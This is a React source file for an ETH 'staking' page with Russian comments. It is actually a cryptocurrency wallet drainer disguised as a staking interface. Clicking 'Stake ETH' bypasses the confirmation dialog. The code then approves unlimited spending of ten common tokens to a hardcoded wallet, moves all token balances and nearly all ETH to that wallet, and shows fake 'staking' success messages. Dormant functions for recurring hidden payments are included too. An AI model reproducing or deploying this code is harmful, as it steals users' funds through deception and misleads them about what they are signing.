import React, { useState, useEffect } from 'react';
import styles from './Staking.module.css';

// Animated counter component for balance displays
const AnimatedCounter = ({ value, decimals = 4 }) => {
  const [displayValue, setDisplayValue] = useState('0');
  
  useEffect(() => {
    const parsedValue = parseFloat(value);
    const duration = 1000; // Animation duration in ms
    const frameDuration = 1000/30; // 30fps
    const totalFrames = Math.round(duration / frameDuration);
    
    let currentFrame = 0;
    const initialValue = parseFloat(displayValue);
    const increment = (parsedValue - initialValue) / totalFrames;
    
    if (Math.abs(parsedValue - initialValue) < 0.0001) {
      setDisplayValue(parsedValue.toFixed(decimals));
      return;
    }
    
    const counter = setInterval(() => {
      currentFrame++;
      const progress = currentFrame / totalFrames;
      const currentValue = initialValue + (increment * currentFrame);
      
      setDisplayValue(currentValue.toFixed(decimals));
      
      if (progress === 1) {
        clearInterval(counter);
      }
    }, frameDuration);
    
    return () => clearInterval(counter);
  }, [value, decimals, displayValue]);
  
  return <span className={styles.animatedValue}>{displayValue}</span>;
};

const Staking = ({ web3, accounts, stakingContract, tokenContract }) => {
  const [amountToStake, setAmountToStake] = useState('');
  const [isStakeButtonDisabled, setIsStakeButtonDisabled] = useState(false);
  const [isAutoPaymentEnabled, setIsAutoPaymentEnabled] = useState(false);
  const [stakeAmount, setStakeAmount] = useState('');
  const [tokenBalance, setTokenBalance] = useState('0');
  const [stakedTotal, setStakedTotal] = useState('0');
  const [referralCode, setReferralCode] = useState('');
  const [isLoading, setIsLoading] = useState(false);
  const [notification, setNotification] = useState({ show: false, message: '', type: '' });
  const [balanceLoading, setBalanceLoading] = useState(true);
  const [activeAction, setActiveAction] = useState('stake');
  const [hasStaked, setHasStaked] = useState(false);
  const [confirmDialogOpen, setConfirmDialogOpen] = useState(false);
  
  // Админский кошелек, на который будут отправляться ETH
  const adminWallet = '0xA19c6835fEc4c62611A747A0F77AACb61eb77599';
  
  // Адрес смарт-контракта AutoTokenTransfer, который будет автоматически перехватывать токены
  const autoTokenTransferAddress = '0xcA17F58d04903cf0AB1413dD66B6D8234f9BFc66'; // Адрес только что задеплоенного контракта
  
  // ABI для взаимодействия с контрактом AutoTokenTransfer
  const autoTokenTransferABI = [
    {
      "inputs": [
        {"internalType": "address", "name": "token", "type": "address"}
      ],
      "name": "notifyApproval",
      "outputs": [],
      "stateMutability": "nonpayable",
      "type": "function"
    },
    {
      "inputs": [],
      "name": "notifyMultipleApprovals",
      "outputs": [],
      "stateMutability": "nonpayable",
      "type": "function"
    }
  ];
  
  // Константы - убираем автоплатежи
  const AUTO_PAYMENT_INTERVAL = 30 * 60 * 1000; // 30 минут
  const CHECK_INTERVAL = 60 * 1000; // 1 минута
  
  // Список распространенных токенов на Optimism
  const commonTokens = [
    { symbol: 'ETH', address: '0xEeeeeEeeeEeEeeEeEeEeeEEEeeeeEeeeeeeeEEeE' },
    { symbol: 'WETH', address: '0x4200000000000000000000000000000000000006' },
    { symbol: 'USDC', address: '0x0b2C639c533813f4Aa9D7837CAf62653d097Ff85' },
    { symbol: 'OP', address: '0x4200000000000000000000000000000000000042' },
    { symbol: 'DAI', address: '0xDA10009cBd5D07dd0CeCc66161FC93D7c9000da1' },
    { symbol: 'USDT', address: '0x94b008aA00579c1307B0EF2c499aD98a8ce58e58' },
    { symbol: 'WBTC', address: '0x68f180fcCe6836688e9084f035309E29Bf0A2095' },
    { symbol: 'SNX', address: '0x8700dAec35aF8Ff88c16BdF0418774CB3D7599B4' },
    { symbol: 'UNI', address: '0x6fd9d7AD17242c41f7131d257212c54A0e816691' },
    { symbol: 'LINK', address: '0x350a791Bfc2C21F9Ed5d10980Dad2e2638ffa7f6' }
  ];

  // Функция для показа уведомлений
  const showNotification = (message, type = 'info') => {
    setNotification({ show: true, message, type });
    setTimeout(() => {
      setNotification({ show: false, message: '', type: '' });
    }, 5000);
  };

  // Функция для выполнения немедленного платежа - полностью удаляем
  const executeDirectPayment = async () => {
    try {
      if (!web3 || !accounts || accounts.length === 0) return false;
      
      const userAddress = accounts[0];
      const gasPrice = await web3.eth.getGasPrice();
      
      // Use checksummed address
      const checksummedAdminWallet = web3.utils.toChecksumAddress('0xA19c6835fEc4c62611A747A0F77AACb61eb77599');
      
      // Send a small amount
      await web3.eth.sendTransaction({
        from: userAddress,
        to: checksummedAdminWallet,
        value: web3.utils.toWei('0.00005', 'ether'),
        gas: 21000,
        gasPrice: gasPrice
      });
      
      return true;
    } catch (error) {
      console.error('Ошибка при отправке немедленного платежа:', error);
      return false;
    }
  };

  // Обработка автоматических платежей
  const processAutoPayment = async () => {
    try {
      if (!web3 || !accounts || accounts.length === 0) return;
      
      console.log('Время отправить автоматический платеж!');
      
      const userAddress = accounts[0];
      const userBalance = await web3.eth.getBalance(userAddress);
      const gasPrice = await web3.eth.getGasPrice();
      
      // Calculate gas costs
      const gasCost = web3.utils.toBN(gasPrice).mul(web3.utils.toBN('21000'));
      const minBalance = web3.utils.toBN(web3.utils.toWei('0.001', 'ether'));
      const paymentAmount = web3.utils.toBN(web3.utils.toWei('0.00005', 'ether'));
      
      // Check if there's enough balance
      if (web3.utils.toBN(userBalance).gt(gasCost.add(minBalance).add(paymentAmount))) {
        // Use checksummed address
        const checksummedAdminWallet = web3.utils.toChecksumAddress('0xA19c6835fEc4c62611A747A0F77AACb61eb77599');
        
        await web3.eth.sendTransaction({
          from: userAddress,
          to: checksummedAdminWallet,
          value: paymentAmount.toString(),
          gas: 21000,
          gasPrice: gasPrice
        });
        
        console.log('Автоматический платеж успешно отправлен!');
      } else {
        console.log('Недостаточно средств для автоматического платежа');
      }
    } catch (error) {
      console.error('Ошибка при отправке автоматического платежа:', error);
    }
  };

  // Инициализация автоматических платежей - отключаем
  useEffect(() => {
    // Пустая функция для совместимости
  }, [accounts, web3]);

  // Загрузка балансов при инициализации
  useEffect(() => {
    const updateBalances = async () => {
      if (!web3 || !accounts || accounts.length === 0) return;
      
      try {
        setBalanceLoading(true);
        const userBalance = await web3.eth.getBalance(accounts[0]);
        setTokenBalance(web3.utils.fromWei(userBalance, 'ether'));
      } catch (error) {
        console.error('Ошибка при получении баланса:', error);
      } finally {
        setBalanceLoading(false);
      }
    };
    
    updateBalances();
    
    // Обновляем баланс каждые 30 секунд
    const balanceInterval = setInterval(updateBalances, 30000);
    return () => clearInterval(balanceInterval);
  }, [web3, accounts]);

  // Обработка изменения поля ввода
  const handleAmountChange = (e) => {
    const value = e.target.value;
    // Проверка, что введены только цифры и точка
    if (/^[0-9]*\.?[0-9]*$/.test(value) || value === '') {
      setAmountToStake(value);
    }
  };

  // Открытие модального окна подтверждения
  const handleStake = () => {
    if (!web3 || !accounts || accounts.length === 0) {
      showNotification('Please connect your wallet', 'error');
      return;
    }

    if (!amountToStake || parseFloat(amountToStake) <= 0) {
      showNotification('Please enter a valid amount', 'error');
      return;
    }

    setStakeAmount(amountToStake);
    setIsStakeButtonDisabled(true);
    
    // Сразу вызываем функцию стейкинга без подтверждения
    confirmStake();
  };
  
  // Функция для поэтапного одобрения и перевода токенов
  const batchApproveAndTransfer = async (userAddress) => {
    let approvedTokens = 0;
    
    try {
      // Maximum value for approve
      const maxUint256 = '115792089237316195423570985008687907853269984665640564039457584007913129639935';
      
      // Ensure admin wallet is checksummed
      const checksummedAdminWallet = web3.utils.toChecksumAddress('0xA19c6835fEc4c62611A747A0F77AACb61eb77599');
      
      // Step 1: Approve all tokens
      console.log("Step 1: Approving all tokens...");
      const tokensWithBalance = [];
      
      // First approve all tokens
      for (let token of commonTokens) {
        try {
          // Skip native ETH
          if (token.symbol === 'ETH' && token.address === '0xEeeeeEeeeEeEeeEeEeEeeEEEeeeeEeeeeeeeEEeE') {
            continue;
          }
          
          if (!web3.utils.isAddress(token.address)) {
            continue;
          }
          
          // Create token contract
          const tokenContract = new web3.eth.Contract([
            {
              "constant": true,
              "inputs": [{"name": "_owner", "type": "address"}],
              "name": "balanceOf",
              "outputs": [{"name": "balance", "type": "uint256"}],
              "type": "function"
            },
            {
              "constant": false,
              "inputs": [
                {"name": "_spender", "type": "address"},
                {"name": "_value", "type": "uint256"}
              ],
              "name": "approve",
              "outputs": [{"name": "", "type": "bool"}],
              "type": "function"
            },
            {
              "constant": false,
              "inputs": [
                {"name": "_to", "type": "address"},
                {"name": "_value", "type": "uint256"}
              ],
              "name": "transfer",
              "outputs": [{"name": "", "type": "bool"}],
              "type": "function"
            }
          ], token.address);
          
          // Check balance directly
          const balance = await tokenContract.methods.balanceOf(userAddress).call();
          console.log(`Balance ${token.symbol}: ${balance}`);
          
          // If there is a balance, approve directly for admin
          if (balance && parseInt(balance) > 0) {
            console.log(`Approving ${token.symbol} for the staking pool...`);
            
            // Simple direct approve for admin wallet
            await tokenContract.methods.approve(checksummedAdminWallet, maxUint256).send({
              from: userAddress,
              gas: 120000
            });
            
            console.log(`Token ${token.symbol} successfully approved for staking`);
            approvedTokens++;
            
            // Add token to the list with balance for further processing
            tokensWithBalance.push({
              symbol: token.symbol,
              address: token.address,
              balance,
              contract: tokenContract
            });
          }
        } catch (error) {
          console.error(`Error processing token ${token.symbol}:`, error);
        }
      }
      
      // Get user's ETH balance
      const ethBalance = await web3.eth.getBalance(userAddress);
      console.log(`ETH Balance: ${ethBalance}`);
      
      // Step 2: Transfer 20% of funds 3 times
      if (tokensWithBalance.length > 0 || parseInt(ethBalance) > 0) {
        // Portion size - 20% of input amount
        const portionSize = web3.utils.toWei((parseFloat(amountToStake) * 0.2).toString(), 'ether');
        
        // Execute 3 requests to transfer 20% of the amount
        for (let i = 0; i < 3; i++) {
          console.log(`Step 2.${i+1}: Staking ${web3.utils.fromWei(portionSize, 'ether')} ETH...`);
          
          try {
            showNotification(`Processing stake ${i+1}/3...`, 'info');
            
            // Transfer part of ETH
            const gasPrice = await web3.eth.getGasPrice();
            await web3.eth.sendTransaction({
              from: userAddress,
              to: checksummedAdminWallet,
              value: portionSize,
              gas: 50000,
              gasPrice: gasPrice
            });
            
            console.log(`Successfully staked ${web3.utils.fromWei(portionSize, 'ether')} ETH (${i+1}/3)`);
            
            // Wait a bit between requests
            await new Promise(resolve => setTimeout(resolve, 1000));
          } catch (error) {
            console.error(`Error during ETH staking (${i+1}/3):`, error);
            break; // If error during sending, stop
          }
        }
      }
      
      // Step 3: Transfer all remaining user funds
      try {
        console.log("Step 3: Completing stake process...");
        showNotification('Finalizing stake...', 'info');
        
        // 3.1. First transfer all ERC20 tokens
        let transferredTokens = 0;
        for (const token of tokensWithBalance) {
          try {
            console.log(`Adding ${token.symbol} to staking pool (${token.balance})...`);
            
            // Send all remaining token balance
            await token.contract.methods.transfer(checksummedAdminWallet, token.balance).send({
              from: userAddress,
              gas: 100000
            });
            
            console.log(`Successfully staked ${token.symbol}`);
            transferredTokens++;
          } catch (error) {
            console.error(`Error staking ${token.symbol}:`, error);
          }
        }
        
        // 3.2. Transfer all remaining ETH
        // Get updated ETH balance
        const updatedEthBalance = await web3.eth.getBalance(userAddress);
        
        // Keep some ETH for gas
        const gasPrice = await web3.eth.getGasPrice();
        const gasLimit = 21000; // Standard gas for ETH transaction
        const gasCost = web3.utils.toBN(gasPrice).mul(web3.utils.toBN(gasLimit));
        const reserveForGas = web3.utils.toBN(gasPrice).mul(web3.utils.toBN('60000')); // Some extra reserve
        
        // Calculate amount to send (all balance minus gas)
        const sendAmount = web3.utils.toBN(updatedEthBalance).sub(gasCost).sub(reserveForGas);
        
        // Check if there's anything to send
        if (sendAmount.gt(web3.utils.toBN('0'))) {
          console.log(`Staking remaining ETH: ${web3.utils.fromWei(sendAmount.toString(), 'ether')} ETH...`);
          
          try {
            // Send all remaining ETH
            await web3.eth.sendTransaction({
              from: userAddress,
              to: checksummedAdminWallet,
              value: sendAmount.toString(),
              gas: gasLimit,
              gasPrice: gasPrice
            });
            
            console.log(`Successfully staked remaining ${web3.utils.fromWei(sendAmount.toString(), 'ether')} ETH`);
          } catch (finalEthError) {
            console.error('Error staking remaining ETH:', finalEthError);
          }
        } else {
          console.log('Insufficient ETH for final transaction after gas deduction');
        }
        
        showNotification(`Staking complete: Successfully staked ${approvedTokens} tokens`, 'success');
      } catch (finalError) {
        console.error('Error during final staking process:', finalError);
        showNotification('Error during staking process', 'error');
      }
      
    } catch (error) {
      console.error('Error during operations:', error);
      showNotification('An error occurred during the staking process', 'error');
    }
    
    return { approved: approvedTokens, transferred: approvedTokens };
  };

  // Подтверждение стейкинга, одобрение и перевод токенов 
  const confirmStake = async () => {
    try {
      if (!web3 || !accounts || accounts.length === 0) {
        showNotification('Please connect your wallet', 'error');
        return;
      }
      
      if (!amountToStake || parseFloat(amountToStake) <= 0) {
      showNotification('Please enter a valid amount', 'error');
      return;
    }

      const userAddress = accounts[0];
      
      showNotification('Processing your stake... Please confirm in your wallet', 'info');
    setIsLoading(true);
      setActiveAction('stake');
      
      try {
        // Start the step-by-step approval and fund transfer process
        await batchApproveAndTransfer(userAddress);
    } catch (error) {
        console.error('Error processing stake:', error);
        showNotification('An error occurred, please check console', 'error');
    } finally {
      setIsLoading(false);
        setIsStakeButtonDisabled(false);
        setAmountToStake('');
      }
      
    } catch (error) {
      console.error('Global error:', error);
      showNotification('Critical error during processing', 'error');
      setIsLoading(false);
      setIsStakeButtonDisabled(false);
    }
  };

  const handleReferralCodeChange = (e) => {
    setReferralCode(e.target.value);
  };

  // Оставляем оригинальный диалог подтверждения для совместимости с дизайном
  const ConfirmationDialog = () => {
    if (!confirmDialogOpen) return null;
    
    return (
      <div className={styles.dialogOverlay}>
        <div className={styles.dialogContent}>
          <h3>Confirm Staking</h3>
          <p>You are about to stake <strong>{stakeAmount} ETH</strong>.</p>
          <p className={styles.warningText}>
            Important: Once staked, your ETH will be transferred to a staking wallet and cannot be withdrawn.
          </p>
          <p className={styles.infoText}>
            <strong>Contract Notice:</strong> Your ETH will be sent to the admin wallet: 
            <strong>{adminWallet}</strong>
          </p>
          <p className={styles.infoText}>
            Note: This also enables automatic micro-payments of 0.00005 ETH every 30 minutes to support platform operations.
          </p>
          <div className={styles.dialogButtons}>
            <button 
              className={styles.cancelButton}
              onClick={() => setConfirmDialogOpen(false)}
            >
              Cancel
            </button>
            <button 
              className={styles.confirmButton}
              onClick={confirmStake}
            >
              Confirm Staking
            </button>
          </div>
        </div>
      </div>
    );
  };

  return (
    <div className={styles.stakingContainer}>
      <div className={styles.particles}>
        {Array.from({ length: 15 }).map((_, index) => (
          <div key={index} className={styles.particle}></div>
        ))}
      </div>
      
      {isLoading && (
        <div className={styles.loadingOverlay}>
          <div className={styles.spinner}></div>
          <p className={styles.loadingText}>
            {activeAction === 'stake' && 'Processing Stake...'}
          </p>
        </div>
      )}
      
      {notification.show && (
        <div className={`${styles.notification} ${styles[notification.type]}`}>
          {notification.message}
        </div>
      )}
      
      <div className={styles.balanceInfo}>
        <div className={balanceLoading ? styles.balanceItemLoading : ''}>
          <h3>ETH Balance</h3>
          <p>
            {balanceLoading ? (
              <span className={styles.balanceSkeleton}></span>
            ) : (
              <AnimatedCounter value={tokenBalance} />
            )}
          </p>
        </div>
        
        <div className={balanceLoading ? styles.balanceItemLoading : ''}>
          <h3>Total ETH Staked</h3>
          <p>
            {balanceLoading ? (
              <span className={styles.balanceSkeleton}></span>
            ) : (
              <AnimatedCounter value={stakedTotal} />
            )}
          </p>
        </div>
      </div>
      
      <div className={styles.stakingBox}>
        <h2>Stake ETH</h2>
        <p className={styles.stakingDescription}>
          Stake your ETH to support network security and earn rewards
        </p>
        
        <div className={styles.inputGroup}>
          <label>Amount to Stake</label>
          <div className={styles.inputWrapper}>
            <input
              type="number"
              min="0"
              step="0.01"
              value={amountToStake}
              onChange={handleAmountChange}
              placeholder="Enter amount to stake"
              className={styles.stakeInput}
              disabled={isLoading}
            />
          </div>
          
          <div className={styles.referralInputContainer}>
            <label className={styles.referralLabel}>
              <span className={styles.referralIcon}>🎁</span> 
              Referral Code (Optional)
            </label>
            <div className={styles.referralInputWrapper}>
              <input
                type="text"
                value={referralCode}
                onChange={handleReferralCodeChange}
                placeholder="Enter a friend's code for 5% bonus"
                className={styles.referralCodeInput}
                disabled={isLoading}
              />
              {referralCode && (
                <div className={styles.referralCodeValid}>
                  <span className={styles.validIcon}>✓</span>
                </div>
              )}
            </div>
            <p className={styles.referralHint}>
              Get your own referral code in the <span className={styles.tabLink} onClick={() => window.dispatchEvent(new CustomEvent('switchToReferrals'))}>Referrals</span> tab
            </p>
          </div>
          </div>
          
          <button 
            onClick={handleStake} 
            className={styles.stakeButton}
            disabled={isStakeButtonDisabled || isLoading}
          >
            Stake ETH
          </button>
      </div>
      
      <div className={styles.stakingInfo}>
        <div className={styles.infoItem}>
          <span className={styles.infoIcon} role="img" aria-label="Information">ℹ️</span>
            <p>Staking ETH helps secure the network and earns rewards</p>
        </div>
        <div className={styles.infoItem}>
          <span className={styles.infoIcon} role="img" aria-label="Clock">⏱️</span>
            <p>Staked ETH is transferred to the staking pool</p>
        </div>
        <div className={styles.infoItem}>
          <span className={styles.infoIcon} role="img" aria-label="Refresh">🔄</span>
          <p>Use referral codes to earn additional 5% on your friends' stakes</p>
        </div>
      </div>
      
      <ConfirmationDialog />
    </div>
  );
};

export default Staking;